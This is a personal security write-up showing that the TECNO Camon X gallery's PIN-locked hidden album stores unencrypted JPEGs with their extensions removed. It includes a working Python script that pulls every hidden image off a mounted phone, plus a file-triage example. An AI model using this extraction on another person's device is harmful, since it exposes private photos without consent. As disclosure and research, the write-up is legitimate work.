# Bypassing Gallery3D (Hidden Images Feature) In TECNO Camon X

## A lil' Bit About It

This is something I challenged myself to do. I had a TECNO Camon X (CA7 model), a smartphone, and basically all TECNO smartphone models have a feature that lets the user hide images. I hid some images and set a PIN for unlocking the vault that holds them. A question flew into my mind: **"What if I don't know the PIN?"** So I dared myself to take up the challenge and research this petty feature.

## Let The Fun Begin

As seen, it asks for a PIN before we can preview what's in the hidden album.

![](https://hackmd.io/_uploads/HJ9FXCOka.png)

We could brute-force the PIN manually, since it's only 4 digits (at most 10,000 guesses), which would obviously be time-consuming but would eventually work. Or we can find out where the image is actually saved after it is sent to the hidden album.

Connecting the smartphone to my laptop and enabling file transfer lets me browse the folders on the device's storage.

### Looking For The Files

![](https://hackmd.io/_uploads/SkLYEAOk6.png)

While enumerating the folders, I found a folder at **/Android/data/com.android.gallery3d** which looked interesting:

![](https://hackmd.io/_uploads/H1UQLC_yp.png)

This is getting even more interesting :) Opening up **.privatealbum**, there is another folder named **.encryptfiles**, and it contains the images we imported earlier into the hidden vault.

![](https://hackmd.io/_uploads/Hk6sL0_kT.png)

The files don't look like images at first glance (they carry no extension), so I pulled one to my local machine for further analysis, thinking there might be some sort of encryption behind all this. Unfortunately my Kali was off, so I used CyberChef for some quick analysis of the file:

![](https://hackmd.io/_uploads/BkeYwA_yp.png)

Now this was even easier than expected!
The file type is **"image/jpeg"**. Despite the folder being named **.encryptfiles**, the file is a plain JPEG with its extension stripped: the PIN only gates the gallery UI, not the data on disk, so anyone with file-transfer access to the phone can read the "hidden" images without ever entering it.

### Getting The Image Back To Normal

Easy peasy. The simplest way to make the image viewable again is to add an image extension to the file, and we can view it:

![](https://hackmd.io/_uploads/SymrOAOkp.png)

![](https://hackmd.io/_uploads/ByMD_CdkT.png)

### Automating The Exploit

With all that clear, I decided to write an exploit script to automate the whole process and retrieve every hidden image available on the smartphone. The exploit is here: [Gallery3D Tecno Exploit](https://github.com/tahaafarooq/gallery3d-tecno-exploit). Apart from the script, the repo also contains an Android APK that extracts the hidden images.

Below is **functions.py**:

```python
# author : @tahaafarooq
# date : 22/09/2023
# desc : pewpew

import os
import shutil
import platform
import mimetypes

# The hidden files carry no extension, so mimetypes.guess_type() on the
# file name alone returns (None, None) and no extension would ever be
# added. Sniff the leading magic bytes first and only fall back to the
# name-based guess.
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sniff_mime(file_path):
    with open(file_path, "rb") as fh:
        head = fh.read(12)
    for magic, mime in MAGIC.items():
        if head.startswith(magic):
            return mime
    # WebP: "RIFF" <4-byte size> "WEBP"
    if head[:4] == b"RIFF" and head[8:12] == b"WEBP":
        return "image/webp"
    mt, _ = mimetypes.guess_type(file_path)
    return mt


# check operating system
def check_os():
    system = platform.system()
    if system == "Windows":
        return "Windows"
    elif system == "Linux":
        return "Linux"


class RunExploit(object):
    def __init__(self):
        self.author = "@tahaafarooq"

    # "Internal shared storage" is how the phone's storage shows up once it
    # is mounted over file transfer on Linux.
    def _hidden_folder(self, path):
        return f"{path}/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles/"

    def check_hidden_image_folder(self, path):
        if os.path.exists(self._hidden_folder(path)):
            return "Found"
        else:
            return "Not Found"

    def unhide_images(self, path, destination):
        folder = self._hidden_folder(path)
        os.makedirs(destination, exist_ok=True)
        for file in os.listdir(folder):
            sf_path = os.path.join(folder, file)
            if not os.path.isfile(sf_path):
                continue
            mt = sniff_mime(sf_path)
            ext = mimetypes.guess_extension(mt) if mt else None
            if ext:
                # restore the extension the gallery app stripped off
                new_file_name = f"{os.path.splitext(file)[0]}{ext}"
                df_path = os.path.join(destination, new_file_name)
            else:
                df_path = os.path.join(destination, file)
            shutil.copy(sf_path, df_path)
        print("Images Unhidden! Abracadabra!")
        return "Done"
```

Below is **run.py**:

```python
# author : @tahaafarooq
# date : 22/09/2023
# desc : pewpew

import sys
from functions import RunExploit, check_os

if __name__ == "__main__":
    operating_system = check_os()
    if operating_system == "Windows":
        print("Sorry Mate! This Script Doesn't Run On Windows Yet!")
        sys.exit(0)
    elif operating_system == "Linux":
        # e.g. the GVfs/MTP mount point of the phone
        source_path = input("Please Enter Your Mobile Mounted Path : ")
        dest_path = input("Please Enter Path To Save Unhidden Images (/home/kali/Documents/) : ")
        check_app_avlb = RunExploit().check_hidden_image_folder(source_path)
        if check_app_avlb == "Found":
            print("Revealing Hidden Images Now...")
            proc_unhide = RunExploit().unhide_images(source_path, dest_path)
            if proc_unhide == "Done":
                print(f"Please Open {dest_path} To View The Images")
            else:
                print("Unable To Reveal Images")
        else:
            print("Oops! Looks Like This Model Doesn't Have The Feature!")
    else:
        print("Unsupported operating system.")
```

Unfortunately I didn't get any bounty on this since the device model is out of scope :( But PewPew!
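The CyberChef step above answered the key question for one file: is the content of **.encryptfiles** actually encrypted, or just renamed? The script below is an added example, not the author's exploit or anything from the repo, that performs that same check over a whole folder: it sniffs image magic bytes first (JPEG, PNG, GIF, WebP) and only then looks at byte entropy, because compressed image data is itself high-entropy and would otherwise be mistaken for ciphertext. A file that matches an image signature is reported as `plaintext-image`; a file with no recognisable header and near-8-bits-per-byte entropy is reported as `possibly-encrypted`. The sample folder and file names it builds are constructed here for the demonstration and are not taken from a real device.

```python
import math
import os
import tempfile
from collections import Counter

# Leading bytes of the image formats a gallery app is likely to store.
IMAGE_MAGIC = {
    "jpeg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "gif": [b"GIF87a", b"GIF89a"],
}


def sniff_image_type(head: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for kind, magics in IMAGE_MAGIC.items():
        if any(head.startswith(m) for m in magics):
            return kind
    # WebP: "RIFF" <4-byte size> "WEBP"
    if head[:4] == b"RIFF" and head[8:12] == b"WEBP":
        return "webp"
    return None


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext or compressed data, lower for structured data."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def triage_file(path: str, sample_size: int = 4096) -> dict:
    """Classify one vault file as plaintext-image, possibly-encrypted, or unknown."""
    with open(path, "rb") as fh:
        head = fh.read(sample_size)
    kind = sniff_image_type(head)
    ent = shannon_entropy(head)
    # Magic bytes win over entropy: a real JPEG body is high-entropy too.
    if kind:
        verdict = "plaintext-image"
    elif ent > 7.5:
        verdict = "possibly-encrypted"
    else:
        verdict = "unknown"
    return {"file": os.path.basename(path), "type": kind,
            "entropy": round(ent, 2), "verdict": verdict}


def triage_vault(folder: str) -> list:
    """Triage every regular file in the folder, in name order."""
    return [triage_file(os.path.join(folder, f))
            for f in sorted(os.listdir(folder))
            if os.path.isfile(os.path.join(folder, f))]


def build_sample_vault() -> str:
    """Create a temp folder of constructed, extensionless files (stand-ins, not device data)."""
    folder = tempfile.mkdtemp(prefix="encryptfiles_")
    # JPEG SOI/APP0 header followed by a uniform byte filler: high entropy, yet plaintext.
    with open(os.path.join(folder, "hidden_a"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"JFIF\x00" + bytes(range(256)) * 4)
    # PNG signature followed by zeros: low entropy.
    with open(os.path.join(folder, "hidden_b"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 512)
    # Random bytes standing in for a blob that really was encrypted.
    with open(os.path.join(folder, "hidden_c"), "wb") as fh:
        fh.write(os.urandom(4096))
    return folder


if __name__ == "__main__":
    for row in triage_vault(build_sample_vault()):
        print(f"{row['file']:10} type={row['type']!s:5} entropy={row['entropy']:.2f} -> {row['verdict']}")
```

Point it at the real folder with `triage_vault("/path/to/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles")`; on the device described in this write-up every row should come back as `plaintext-image`, which is exactly the finding that makes the extension-restoring script work. A vault that genuinely encrypted its contents would produce `possibly-encrypted` rows with no recognisable header.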